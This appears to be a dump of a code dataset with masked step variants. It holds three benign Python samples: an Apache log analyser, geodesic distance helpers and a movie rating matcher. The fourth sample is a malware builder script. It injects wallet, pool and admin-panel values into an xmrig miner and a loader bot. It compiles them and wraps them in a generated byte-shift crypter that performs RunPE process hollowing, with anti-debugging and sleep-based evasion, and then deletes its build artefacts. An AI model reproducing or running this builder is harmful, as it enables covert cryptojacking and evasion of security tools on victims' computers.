| code (string, lengths 13–1.2M) | order_type (string, 1 class) | original_example (dict) | step_ids (list, lengths 1–5) |
---|---|---|---|
#!/usr/bin/python
# coding:utf-8
"""Parse an Apache access log and report the traffic generated by each host.

The processed output looks like:  Host IP: 192.168.14.44   Traffic: 814 K
Usage: python <script name> <log file>; e.g. python python.analysis.apachelog.py access.log

by wangdd 2016/02/02
"""
import os
import re
import sys
import shelve

# The re module does the parsing: re.match(...) / re.compile(...).match return
# a match object whose main methods are group([group1, ...]), groups([default]),
# groupdict([default]), start([group]) and end([group]).
#
# Apache log format: 192.168.47.82 - - [17/Dec/2014:16:41:03 +0800] "GET /application/account/loginIndex.htm HTTP/1.1" 200 56273
#
# Basic idea: match every line with the regular expression below, extract the
# bytes sent per client IP, store the totals in apache_log.db with shelve, and
# print a formatted report.
log_line_re = re.compile(r'''(?P<remote_host>^\d{1,3}\.(\d{1,3}\.){2}\d{1,3})
                             \s+
                             (?P<log_name>\S+)
                             \s+
                             (?P<login_user>\S+)
                             \s+
                             (?P<time>\[.*\])
                             \s+
                             ".*"
                             \s+
                             (?P<status>\d+)
                             \s+
                             (?P<bytes_sent>-|\d+)
                          ''', re.X)

# Extract the needed fields from one log line; returns a dict.
def logline(line):
    m = log_line_re.search(line)
    if m:
        groupdict = m.groupdict()
        if groupdict['bytes_sent'] == '-':
            groupdict['bytes_sent'] = '0'
        return groupdict
    else:
        return {'remote_host': None, 'status': None, 'bytes_sent': '0'}

# Aggregate the parsed lines and print the traffic per host.
def log_report(logfile):
    report_dict = {}
    for line in logfile:
        line_dict = logline(line)
        try:
            bytes_sent = int(line_dict['bytes_sent'])
        except ValueError:
            continue
        report_dict.setdefault(line_dict['remote_host'], []).append(bytes_sent)
    for k, v in report_dict.iteritems():
        total = 0
        if k is not None:
            for data in v:
                total = total + data
            print 'Host IP: %s\t Traffic: %s K' % (k, total / 1024)

# Persist the per-host totals to apache_log.db using the shelve module.
def store_data(file):
    # skip the rebuild if the database file already exists
    if os.path.isfile('apache_log.db'):
        return
    shelv_file = shelve.open('apache_log.db')
    for line in file:
        d_line = logline(line)
        if d_line['remote_host'] is None:
            continue  # line did not match the log format
        shelv_file[d_line['remote_host']] = \
            shelv_file.setdefault(d_line['remote_host'], 0) + \
            int(d_line['bytes_sent'])
    shelv_file.close()

if __name__ == '__main__':
    if not len(sys.argv) > 1:
        print __doc__
        sys.exit(1)
    infile_name = sys.argv[1]
    try:
        infile = open(infile_name, 'r')
    except IOError:
        print "please input some file"
        print __doc__
        sys.exit(1)
    log_report(infile)
    infile.seek(0)  # log_report() consumed the file iterator; rewind before storing
    store_data(infile)
    infile.close()
#--------------------------------------------------------------------
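# A minimal, hypothetical sanity check for logline(), not part of the original
# script; the sample entry is the one quoted in the header comment above:
#
#   >>> sample = '192.168.47.82 - - [17/Dec/2014:16:41:03 +0800] "GET /application/account/loginIndex.htm HTTP/1.1" 200 56273'
#   >>> logline(sample)['remote_host']
#   '192.168.47.82'
#   >>> logline(sample)['bytes_sent']
#   '56273'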
|
normal
|
{
"blob_id": "3240a7fb9fbd5cd84165e68f8406e0a146c2b6b6",
"index": 1454,
"step-1": "#!/usr/bin/python\n# coding:utf-8\n#\n#这个脚本主要是对apache日志文件的处理分析,过滤出需要的信息\n#处理后得到的数据是:\t主机IP:192.168.14.44 访问流量:814 K\n#使用说明 python 脚本名 文件名; eg:python python.analysis.apachelog.py access.log\n#\n#\tby wangdd 2016/02/02\n#\nimport os\nimport re\nimport sys\nimport shelve\n\n#re 模块,利用re模块对apahce日志进行分析\n#通过 re.match(……) 和 re.compile(……).match返回\n# 该对象有如下方法和属性:\n# 方法:\n# group( [group1, ...])\n# groups( [default])\n# groupdict( [default])\n# start( [group])\n# end( [group]) \n#\n# apache 日志格式: 192.168.47.82 - - [17/Dec/2014:16:41:03 +0800] \"GET /application/account/loginIndex.htm HTTP/1.1\" 200 56273\n#\n#基本思路是,利用re模块进行正则匹配,过滤出对应IP的访问字节数,然后把数据保存到apache_log.db数据库中,最后进行数据的格式\n\nlog_line_re = re.compile(r'''(?P<remote_host>^\\d{1,3}\\.(\\d{1,3}\\.){2}\\d{1,3})\n\t\t\t \\s+\n\t\t\t (?P<log_name>\\S+)\n\t\t\t \\s+\n\t\t\t (?P<login_user>\\S+)\n\t\t\t \\s+\n\t\t\t (?P<time>\\[.*\\])\n\t\t \\s+\n \t\t\t \".*\"\n\t\t\t \\s+\n\t\t\t (?P<status>\\d+)\n\t\t\t \\s+\n\t\t\t (?P<bytes_sent>-|\\d+)\n\t\t\t''',re.X)\n#利用正则表达过滤出需要的数据,返回一个字典类型的数据\ndef logline(line):\n m = log_line_re.search(line)\n if m:\n\tgroupdict = m.groupdict()\n\tif groupdict['bytes_sent'] == '-':\n\t\tgroupdict['bytes_sent'] = '0'\n\treturn groupdict\n else:\n\treturn {'remote_host':None,'status':None,'bytes_sent':\"0\",}\n#从获取的字典中得到需要的数据\ndef log_report(logfile):\n report_dict ={}\n for line in logfile:\n\tline_dict = logline(line)\n\ttry:\n\t\tbytes_sent = int(line_dict['bytes_sent'])\n\texcept ValueError:\n\t\tcontinue\n\treport_dict.setdefault(line_dict['remote_host'],[]).append(bytes_sent)\n for k,v in report_dict.iteritems():\n\tsum = 0\n\tif k != None:\n\t\tfor data in v:\n\t\t\tsum = sum +data\n \t\tprint '主机IP:%s\\t 访问流量:%s K' % (k,sum/1024)\n\n#这个函数是把处理后的数据保存到data.db文件中,利用了shelv 模块\ndef store_data(file):\n shelv_file = shelve.open('apache_log.db')\n if not os.path.isfile('shelv_file'):\n \tfor line in file:\n\t\td_line = logline(line)\n \tshelv_file[d_line['remote_host']] = \\\n \tshelv_file.setdefault(d_line['remote_host'],0) + \\\n \tint (d_line['bytes_sent'])\n\t\tdata_file.close()\n\t\tshelv_file.close() \n\nif __name__ == '__main__':\n if not len(sys.argv) >1:\n\tprint __doc__\n\tsys.exit(1)\n infile_name = sys.argv[1]\n try:\n\tinfile = open(infile_name,'r')\n except IOError:\n\tprint \"please input some file\"\n\tprint __doc__\n\tsys.exit(1)\n log_report(infile)\n store_data(infile)\n infile.close()\n\n#--------------------------------------------------------------------\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import math

def Distance(t1, t2):
    # haversine distance between two (lat, lon) points given in degrees
    RADIUS = 6371000.  # earth's mean radius in metres
    p1 = [0, 0]
    p2 = [0, 0]
    p1[0] = t1[0] * math.pi / 180.
    p1[1] = t1[1] * math.pi / 180.
    p2[0] = t2[0] * math.pi / 180.
    p2[1] = t2[1] * math.pi / 180.
    d_lat = (p2[0] - p1[0])
    d_lon = (p2[1] - p1[1])
    a = math.sin(d_lat / 2) * math.sin(d_lat / 2) + math.cos(
        p1[0]) * math.cos(p2[0]) * math.sin(d_lon / 2) * math.sin(d_lon / 2)
    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
    d = RADIUS * c
    return d

def tile_number(lon_deg, lat_deg, zoom):
    # simple equal-angle tiling with 2**zoom tiles per axis; note this is not
    # the Web-Mercator slippy-map scheme
    n = 2.0 ** zoom
    xtile = int((lon_deg + 180.0) / 360.0 * n)
    ytile = int((lat_deg + 90.0) / 180.0 * n)
    return (xtile, ytile)
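# A small usage sketch, not part of the original module; the coordinates are
# assumed example values. Distance() takes (lat, lon) pairs in degrees and
# returns metres, tile_number() takes lon/lat in degrees plus a zoom level.
if __name__ == "__main__":
    ljubljana = (46.0569, 14.5058)  # assumed example coordinates (lat, lon)
    maribor = (46.5547, 15.6459)    # assumed example coordinates (lat, lon)
    print("distance in m: %.0f" % Distance(ljubljana, maribor))
    print("tile at zoom 10: %s" % (tile_number(14.5058, 46.0569, 10),))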
|
normal
|
{
"blob_id": "f3f5b14917c89c5bc2866dd56e212bd3ec8af1cd",
"index": 4841,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef tile_number(lon_deg, lat_deg, zoom):\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((lat_deg + 90.0) / 180.0 * n)\n return xtile, ytile\n",
"step-3": "<mask token>\n\n\ndef Distance(t1, t2):\n RADIUS = 6371000.0\n p1 = [0, 0]\n p2 = [0, 0]\n p1[0] = t1[0] * math.pi / 180.0\n p1[1] = t1[1] * math.pi / 180.0\n p2[0] = t2[0] * math.pi / 180.0\n p2[1] = t2[1] * math.pi / 180.0\n d_lat = p2[0] - p1[0]\n d_lon = p2[1] - p1[1]\n a = math.sin(d_lat / 2) * math.sin(d_lat / 2) + math.cos(p1[0]) * math.cos(\n p2[0]) * math.sin(d_lon / 2) * math.sin(d_lon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = RADIUS * c\n return d\n\n\ndef tile_number(lon_deg, lat_deg, zoom):\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((lat_deg + 90.0) / 180.0 * n)\n return xtile, ytile\n",
"step-4": "import math\n\n\ndef Distance(t1, t2):\n RADIUS = 6371000.0\n p1 = [0, 0]\n p2 = [0, 0]\n p1[0] = t1[0] * math.pi / 180.0\n p1[1] = t1[1] * math.pi / 180.0\n p2[0] = t2[0] * math.pi / 180.0\n p2[1] = t2[1] * math.pi / 180.0\n d_lat = p2[0] - p1[0]\n d_lon = p2[1] - p1[1]\n a = math.sin(d_lat / 2) * math.sin(d_lat / 2) + math.cos(p1[0]) * math.cos(\n p2[0]) * math.sin(d_lon / 2) * math.sin(d_lon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = RADIUS * c\n return d\n\n\ndef tile_number(lon_deg, lat_deg, zoom):\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((lat_deg + 90.0) / 180.0 * n)\n return xtile, ytile\n",
"step-5": "import math\n\ndef Distance(t1, t2):\n RADIUS = 6371000. # earth's mean radius in km\n p1 = [0, 0]\n p2 = [0, 0]\n p1[0] = t1[0] * math.pi / 180.\n p1[1] = t1[1] * math.pi / 180.\n p2[0] = t2[0] * math.pi / 180.\n p2[1] = t2[1] * math.pi / 180.\n\n d_lat = (p2[0] - p1[0])\n d_lon = (p2[1] - p1[1])\n\n a = math.sin(d_lat / 2) * math.sin(d_lat / 2) + math.cos(\n p1[0]) * math.cos(p2[0]) * math.sin(d_lon / 2) * math.sin(d_lon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = RADIUS * c\n return d\n\ndef tile_number(lon_deg, lat_deg, zoom):\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((lat_deg + 90.0) / 180.0 * n)\n return (xtile, ytile)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
import numpy as np
import difflib as dl
import sys

# Return the first close match, or an empty string when there is none.
def get_close(x):
    if len(x) == 0:
        return ""
    return x[0]

list_file = sys.argv[1]
rating_file = sys.argv[2]
output_file = sys.argv[3]
movie_list = open(list_file).read().splitlines()
movie_data = pd.DataFrame({'movie': movie_list})
rating_data = pd.read_csv(rating_file)
rating_data['rating'] = rating_data['rating'].astype(str).astype(float)
rating_data['counts'] = pd.Series(1, index=rating_data.index)
# sum counts and ratings per title (list selection avoids the deprecated tuple indexing)
rating_data = rating_data.groupby(['title'])[['counts', 'rating']].sum().reset_index()
rating_data['average_rating'] = pd.Series(rating_data['rating']/rating_data['counts'], index=rating_data.index)
# fuzzy-match each listed movie against the rated titles
movie_data['closed'] = pd.Series(movie_data['movie'], index=movie_data.index)
movie_data['closed'] = movie_data['closed'].apply(lambda x: dl.get_close_matches(x, rating_data['title'], n=1))
movie_data['closed'] = movie_data['closed'].apply(get_close)
result = movie_data.set_index('closed').join(rating_data.set_index('title')).reset_index()
result['average_rating'] = result['average_rating'].apply(lambda x: round(x, 2))
result = result.drop(['closed', 'rating', 'counts'], axis=1)
result = result.set_index('movie')
result.to_csv(output_file, sep=',', encoding='utf-8')
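# Hypothetical invocation (the file names below are assumptions, not part of
# the original script):
#
#   python match_ratings.py movie_list.txt ratings.csv matched_ratings.csv
#
# The first file holds one movie title per line, the ratings CSV needs at
# least the columns 'title' and 'rating', and the output CSV ends up with the
# columns 'movie' and 'average_rating'.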
|
normal
|
{
"blob_id": "7a9515b1f8cc196eb7551137a1418d5a387e7fd3",
"index": 959,
"step-1": "<mask token>\n\n\ndef get_close(x):\n if len(x) == 0:\n return ''\n return x[0]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_close(x):\n if len(x) == 0:\n return ''\n return x[0]\n\n\n<mask token>\nresult.to_csv(output_file, sep=',', encoding='utf-8')\n",
"step-3": "<mask token>\n\n\ndef get_close(x):\n if len(x) == 0:\n return ''\n return x[0]\n\n\nlist_file = sys.argv[1]\nrating_file = sys.argv[2]\noutput_file = sys.argv[3]\nmovie_list = open(list_file).read().splitlines()\nmovie_data = pd.DataFrame({'movie': movie_list})\nrating_data = pd.read_csv(rating_file)\nrating_data['rating'] = rating_data['rating'].astype(str).astype(float)\nrating_data['counts'] = pd.Series(1, index=rating_data.index)\nrating_data = rating_data.groupby(['title'])['counts', 'rating'].sum(\n ).reset_index()\nrating_data['average_rating'] = pd.Series(rating_data['rating'] /\n rating_data['counts'], index=rating_data.index)\nmovie_data['closed'] = pd.Series(movie_data['movie'], index=movie_data.index)\nmovie_data['closed'] = movie_data['closed'].apply(lambda x: dl.\n get_close_matches(x, rating_data['title'], n=1))\nmovie_data['closed'] = movie_data['closed'].apply(get_close)\nresult = movie_data.set_index('closed').join(rating_data.set_index('title')\n ).reset_index()\nresult['average_rating'] = result['average_rating'].apply(lambda x: round(x, 2)\n )\nresult = result.drop(['closed', 'rating', 'counts'], axis=1)\nresult = result.set_index('movie')\nresult.to_csv(output_file, sep=',', encoding='utf-8')\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport difflib as dl\nimport sys\n\n\ndef get_close(x):\n if len(x) == 0:\n return ''\n return x[0]\n\n\nlist_file = sys.argv[1]\nrating_file = sys.argv[2]\noutput_file = sys.argv[3]\nmovie_list = open(list_file).read().splitlines()\nmovie_data = pd.DataFrame({'movie': movie_list})\nrating_data = pd.read_csv(rating_file)\nrating_data['rating'] = rating_data['rating'].astype(str).astype(float)\nrating_data['counts'] = pd.Series(1, index=rating_data.index)\nrating_data = rating_data.groupby(['title'])['counts', 'rating'].sum(\n ).reset_index()\nrating_data['average_rating'] = pd.Series(rating_data['rating'] /\n rating_data['counts'], index=rating_data.index)\nmovie_data['closed'] = pd.Series(movie_data['movie'], index=movie_data.index)\nmovie_data['closed'] = movie_data['closed'].apply(lambda x: dl.\n get_close_matches(x, rating_data['title'], n=1))\nmovie_data['closed'] = movie_data['closed'].apply(get_close)\nresult = movie_data.set_index('closed').join(rating_data.set_index('title')\n ).reset_index()\nresult['average_rating'] = result['average_rating'].apply(lambda x: round(x, 2)\n )\nresult = result.drop(['closed', 'rating', 'counts'], axis=1)\nresult = result.set_index('movie')\nresult.to_csv(output_file, sep=',', encoding='utf-8')\n",
"step-5": "import pandas as pd\nimport numpy as np\nimport difflib as dl\nimport sys\n\ndef get_close(x):\n\tif len(x) == 0:\n\t\treturn \"\"\n\treturn x[0]\n\nlist_file = sys.argv[1]\nrating_file = sys.argv[2]\noutput_file = sys.argv[3]\n\nmovie_list = open(list_file).read().splitlines()\nmovie_data = pd.DataFrame({'movie': movie_list})\nrating_data = pd.read_csv(rating_file)\nrating_data['rating'] = rating_data['rating'].astype(str).astype(float)\nrating_data['counts'] = pd.Series(1, index=rating_data.index)\nrating_data = rating_data.groupby(['title'])['counts', 'rating'].sum().reset_index()\nrating_data['average_rating'] = pd.Series(rating_data['rating']/rating_data['counts'], index=rating_data.index)\n\nmovie_data['closed'] = pd.Series(movie_data['movie'], index=movie_data.index)\nmovie_data['closed'] = movie_data['closed'].apply(lambda x: dl.get_close_matches(x, rating_data['title'], n=1))\nmovie_data['closed'] = movie_data['closed'].apply(get_close)\n\nresult = movie_data.set_index('closed').join(rating_data.set_index('title')).reset_index()\n\nresult['average_rating'] = result['average_rating'].apply(lambda x: round(x, 2))\nresult = result.drop(['closed', 'rating', 'counts'], axis=1)\nresult = result.set_index('movie')\n\nresult.to_csv(output_file, sep=',', encoding='utf-8')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import os, sys, time, random, subprocess
def load_userdata(wallet, pool, ww, logger, adminka):
with open("D:\\msys64\\xmrig-master\\src\\ex.cpp", "r") as f:
file = f.read()
file = file.replace("%u%", wallet)
file = file.replace("%p%", pool)
file = file.replace("%w%", ww)
with open("D:\\msys64\\xmrig-master\\src\\xmrig.cpp", "w") as w:
w.write(file)
with open(os.getcwd()+"\\Bot\\Miner\\ex.cs", "r") as f:
file = f.read()
file = file.replace("%l%", logger)
file = file.replace("%a%", adminka)
with open(os.getcwd()+"\\Bot\\Miner\\Program.cs", "w") as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd()+"\\file.txt", "r") as f:
file = f.read()
with open(os.getcwd()+"\\Miner\\CryptRunPe\\winhost.cpp", "w") as w:
w.write("#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n")
with open("ex.txt") as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system("%windir%\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileM(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileR(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release /p:Platform=\"WIN32\"")
def xcopy(path, out):
try:
with open(path, "rb") as f:
file = f.read()
with open(out, "wb") as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = '\n\
#include <Windows.h>\n\
#include <winternl.h>\n\
#include <iostream>\n\
#include <string>\n\
#include <fstream>\n\
using namespace std;\n\
int main()\n\
{\n\
FILE * file = fopen("in.exe", "rb");\n\
if (file == NULL) return 0;\n\
fseek(file, 0, SEEK_END);\n\
long int size = ftell(file);\n\
fclose(file);\n\
file = fopen("in.exe", "rb");\n\
unsigned char * in = (unsigned char *)malloc(size);\n\
int bytes_read = fread(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] - 0x0%n%;\n\
}\n\
file = fopen("out.exe", "wb");\n\
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] + 0x0%n%;\n\
}\n\
file = fopen("decr.exe", "wb");\n\
bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
return 0;\n\
}\n\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
os.system("g++ -o enc encoder.cpp")
os.system("C:\Python27\python.exe cv.py")
with open('file.txt', 'r') as r:
with open(os.getcwd()+"\\src\\crypter\\crypter.cpp", "w") as w:
txt = '\
#include "stdafx.h"\n\
#include "Crypter.h"\n\
#include <windows.h>\n\
#include <winternl.h>\n\
#pragma comment(lib,"ws2_32.lib")\n\
#pragma comment(lib,"ntdll.lib")\n\
'+ r.read() + '\
int RunPortableExecutable(void* Image) {\n\
IMAGE_DOS_HEADER* DOSHeader;\n\
IMAGE_NT_HEADERS* NtHeader;\n\
IMAGE_SECTION_HEADER* SectionHeader;\n\
PROCESS_INFORMATION PI;\n\
STARTUPINFOA SI;\n\
CONTEXT* CTX;\n\
DWORD* ImageBase;\n\
void* pImageBase;\n\
int count;\n\
char buffer[MAX_PATH];\n\
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n\
char *CurrentFilePath = buffer;\n\
DOSHeader = PIMAGE_DOS_HEADER(Image);\n\
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n\
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n\
ZeroMemory(&PI, sizeof(PI));\n\
ZeroMemory(&SI, sizeof(SI));\n\
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n\
NtUnmapViewOfSection mNtUnmapViewOfSection;\n\
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n\
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n\
CTX->ContextFlags = CONTEXT_FULL;\n\
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n\
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n\
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n\
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n\
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n\
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n\
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n\
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n\
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n\
}\n\
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n\
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n\
SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n\
ResumeThread(PI.hThread);\n\
return 0;\n\
}\n\
}\n\
}\n\
}\n\
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n\
for (int i = 0; i < 550000; i++)\n\
OutputDebugStringW(L"");\n\
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n\
unsigned char b = rawData[i] + 0x0%n%;\n\
rawData[i] = b;\n\
}\n\
Sleep(((rand() % 5 + 1) + 5) * 1000);\n\
RunPortableExecutable(rawData);\n\
return 0;\n\
}\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
compileM(os.getcwd()+"\\src\\", "ConsoleApplication1")
xcopy(os.getcwd() + "\\src\\Release\\Crypter.exe", os.getcwd()+"\\"+name+".exe")
key = random.randint(1, 100)
u = sys.argv[1]
w = sys.argv[2]
p = sys.argv[3]
l = sys.argv[4]
a = sys.argv[5]
load_userdata(u, p, w, l, a)
compile(os.getcwd()+"\\Bot\\", "LoaderBot")
xcopy(os.getcwd()+"\\Bot\\Miner\\bin\\Release\\LoaderBot.exe", "Bot.exe")
compileR(os.getcwd()+"\\rig\\", "xmrig")
xcopy(os.getcwd()+"\\rig\\Release\\xmrig.exe", "out.exe")
crypt("test", key)
os.system("C:\Python27\python.exe cv.py")
writeBytes(key)
compileM(os.getcwd()+"\\Miner\\", "winhost")
xcopy(os.getcwd()+"\\Miner\\Release\\winhost.exe", "in.exe")
print(os.getcwd()+"\\enc.exe")
subprocess.call(os.getcwd()+"\\enc.exe")
crypt("winhost", key)
os.system("del file.txt")
os.system("del in.exe")
os.system("del out.exe")
os.system("del decr.exe")
os.system("del enc.exe")
os.system("del test.exe")
|
normal
|
{
"blob_id": "d1254e558217cce88de2f83b87d5c54333f1c677",
"index": 9938,
"step-1": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, 
